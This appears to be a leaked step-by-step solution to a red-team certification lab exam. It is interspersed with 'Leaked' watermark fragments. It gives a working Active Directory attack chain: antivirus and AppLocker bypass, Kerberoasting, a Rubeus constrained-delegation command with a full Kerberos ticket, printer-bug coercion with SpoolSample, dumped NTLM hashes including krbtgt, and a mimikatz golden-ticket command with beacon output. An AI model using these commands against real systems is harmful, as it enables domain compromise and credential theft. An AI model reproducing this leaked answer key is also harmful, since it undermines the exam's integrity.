Leaked

Rdp into given machine

AttackPath:

First machine It will be wkstn3

Wkstn-3 (always elevated) -> srv-1 (constrained delegation)-> srv-2 (unconstrained delegation
printer bug)-> dc-2 -> cross trust > dc-1 >sql

ed
ak
Le
ed
ak

Install PowerShell 6 if u need bypass Constrained language mode,

you need to bypass av at wkstn-3 and from the enumeration( your beacon need to be undetected if
Le

using CS)
If using covenant https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD/

Open ur beacon to get a shell back. To get system u need to follow course material always install
elevated and change it to lapsx64.msi as per the app locker policy and place in task.
ed

Run bloodhound
asperoast jjames and atorres and crack them
ak
Le
 Leaked
Le

Psexec into srv-1

ak
ed
Le
ak
ed
Le
ak
ed
Leaked
On srv-1

ed
ak
Le
ed
Impersonate ofisher with contrained delegation
ak

shell c:\temp\rubeus.exe s4u /domain:child.redteamops.local

/ticket:doIFYzCCBV+gAwIBBaEDAgEWooIESzCCBEdhggRDMIIEP6ADAgEFoRgbFkNISUxELlJFRFRFQU1P
Le

UFMuTE9DQUyiKzApoAMCAQKhIjAgGwZrcmJ0Z3QbFkNISUxELlJFRFRFQU1PUFMuTE9DQUyjggPvMII
D66ADAgESoQMCAQKiggPdBIID2baP41WgentW8su9Hevgb/J4Mygq32wmOqQ7f4N9Kx4WaVRS5D8
Mc3vQ7R/XO3ARAY7RV1MyBg7CQENMK87Wfgejad2a0bYXyHu1moCDjYHjNMJO3n4zOZ7FkDPEDOy
RJPgUae1EO9vsipYJjz2/PhBeq2+x6sAFtv7eFIUzzgJeWFyNj5FI/8QWfHwczI08nGDVwHK6rILbNp0e/6T
ychIBtHROnBccvOapIiitWWN4j6Ra5YokuFCp7ZBlX2LQhKSjTnM2/ik9fyMW21RuP6bU6VmSZDNTBRA
QNDoAlwFRR8aE/2LmQ8Mjyj7mCgd7z3jtjdJHaaUqLLkRb2kBzf6QPsnG7KgaWUri+hwk7zrLzFzMHAJN
ed

qy9Y98b31cmUMwj/25lHsPX0WoB4Plb29Rja6GtSzEQ5Y+Tj6VpTXL9DpKJke1hMQc+T44rdEG35ACrZ
NL3Y7A+E3tNhhcFP/xmqXtWqlz6Iar2A5eMw1QXO5qtj670U1KvmSY/rS8gxS9ey/pApYlXZASbaq8Mhy
HsqF9RKy4H+96Y+kTQvma9sN2KaLVHfeUp9BULFCdzFJY3A6QPjI+gOaYacMqvcdkUINrquNLXMuAZHk
2cME43Y4VytTTX8XApVBnIhEVGNb8fPaarXOzO4UNlFi4bpuWKGfOtthLCYZMU/hu02V5JqskJG907kPn
ak

OED40klDpi4izgCaJK5vJ44/Qh0D8njjr4TN6EpbpcfrVmokCX1muUU8zlEHy6XglP1OkQH+29OZV9U/7V/
xq5+tdTPfOC4YrkYVZxBR/N2wPXYzKjK1q7Fx3AVigU45xiwBbSt1pEcp/lmyw8iN1nVDPWmV4kV+wS/b
+jj3oTOH1s/EVhDjNI567gL7U9GkZ7I59Ch/FvzKDpMzRrYmn0RB1B6QpAEr7r0P9aGXmd1M21SEVkJgC
Le

TM7aYvCLeCq5Eh2NtWJRct6Qz27WIZZ4K5g5RPHs/ZQr5UPgTCh1taPAdV9wmFcoUDy+tGgVSb+S+Vi2
qp6R3pIJomqTzjyUTbilqCh0OZT6Nk8H2N5Sf4e49apyD1SJsdf7qHXg6TPyD6YVZzL7j3WSzRbOV2wrHx
TRO+fug2yx2ZO6GZga4PdDmda5Lpq+BNZFX+ADZ/hxtMJpIv6tVbTEK02eJUApow/Q1k30Jnmv+hM0q
r/bKrqvlcQnRUtuEQd/phdNIgVSjjIcH+V0WGFkvUiH0Mrlh3msx1ndnzD97GPkb7puXTNxYoEwT4Y7VR
eUJSjZ2Z8ia/n3vP5aCkJgTBa9pOEpk9O7d8bLNTSp4sRgkiQpuMWCjggECMIH/oAMCAQCigfcEgfR9gfE
wge6ggeswgegwgeWgKzApoAMCARKhIgQgepHAZAV9TuCTEZnPcjMLIKALQhUXreRqmQh2OhBNkzuh
GBsWQ0hJTEQuUkVEVEVBTU9QUy5MT0NBTKITMBGgAwIBAaEKMAgbBlNSVi0xJKMHAwUAYKEAAKU
RGA8yMDIxMDEzMTAzMzAwN1qmERgPMjAyMTAxMzExMzMwMDdapxEYDzIwMjEwMjA1MTIzNTM
Leaked
2WqgYGxZDSElMRC5SRURURUFNT1BTLkxPQ0FMqSswKaADAgECoSIwIBsGa3JidGd0GxZDSElMRC5SR
URURUFNT1BTLkxPQ0FM
/impersonateuser:Administrator /msdsspn:time/srv-2.child.redteamops.local /altservice:cifs,host
/ptt

ed
ak
Le
ed
Do uncontrained delegation on srv-2 to reach dc-2
.\Rubeus.exe monitor /interval:1 (run this on the computer with unconstrained delegation)
Then on another window: .\SpoolSample.exe targetMachine.dc.local currentMachine.local
ak

so get 2 shells, first start rubeus monitor

then use SpoolSample.exe to trigger printer bug

Le

so for you it will be .\SpoolSample.exe dc-2.child.redteamops.local srv-2.child.redteamops.local

For me i just ran monitor and got the tgt
ed
ak
Le
Leaked

ed
ak
Le
ed
Rubeus.exe ptt /ticket:<<paste the above ticket here>>

Jump to dc-2
ak
Le
ed

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c97d17a1aa433f4706143eaf9509fa99:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6ad171448618690dde2c67f72b85a5ea:::
ak

DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:
::
ZPS-
94107178:2101:aad3b435b51404eeaad3b435b51404ee:37dd0e1e8fb505d2e5baaf4a27d2ddbd:::
Le

atorres:2102:aad3b435b51404eeaad3b435b51404ee:f442e0cc228d1a0cb4621ebce433bcdc:::
jjames:2103:aad3b435b51404eeaad3b435b51404ee:59fc0f884922b4ce376051134c71e22c:::
ofisher:2104:aad3b435b51404eeaad3b435b51404ee:0b51e7394c48a3cd6213e2d2e3dceb54:::
DC-2$:1000:aad3b435b51404eeaad3b435b51404ee:684762dd74088932d08c4291f3d6b10f:::
WKSTN-6$:1104:aad3b435b51404eeaad3b435b51404ee:5a28fee9c547fa6f75439d7aec8e123d:::
WKSTN-5$:1105:aad3b435b51404eeaad3b435b51404ee:4503ec7275fa9b51cc611696fef60f82:::
WKSTN-4$:1106:aad3b435b51404eeaad3b435b51404ee:b4ffef5d5c26fedba82d08e4611b72bd:::
WKSTN-3$:1107:aad3b435b51404eeaad3b435b51404ee:1bd6c35d565146c567d4c6de7cd67807:::
Leaked
SRV-1$:1109:aad3b435b51404eeaad3b435b51404ee:877781f8fa251a5801dee79ef8ee1074:::
SRV-2$:1110:aad3b435b51404eeaad3b435b51404ee:b2aadbe584c0f2c0d2a56237e8f1fd73:::
RTO$:1103:aad3b435b51404eeaad3b435b51404ee:e84d40ca65ccac1f8c19237653a9db3f:::

mimikatz kerberos::golden /domain:child.redteamops.local /sid:S-1-5-21-2453654091-64307236-

1669735849 /krbtgt:6ad171448618690dde2c67f72b85a5ea /sids:S-1-5-21-2453654091-64307236-
1669735849-519 /user:administrator /ptt
[*] Tasked beacon to run mimikatz's kerberos::golden /domain:child.redteamops.local /sid:S-1-5-21-

ed
2453654091-64307236-1669735849 /krbtgt:6ad171448618690dde2c67f72b85a5ea /sids:S-1-5-21-
2453654091-64307236-1669735849-519 /user:administrator /ptt command
[+] host called home, sent: 706122 bytes
[+] received output:

ak
User : administrator
Domain : child.redteamops.local (CHILD)
SID : S-1-5-21-2453654091-64307236-1669735849
User Id : 500

Le
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2453654091-64307236-1669735849-519 ;
ServiceKey: 6ad171448618690dde2c67f72b85a5ea - rc4_hmac_nt
Lifetime :

-> Ticket : ** Pass The Ticket **

ed
* PAC generated
* PAC signed
ak

* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Le

Golden ticket for 'administrator @ child.redteamops.local' successfully submitted for current session
ed
ak
Le
 Leaked
Le
ak
ed
Le
ak
ed
Le
ak
ed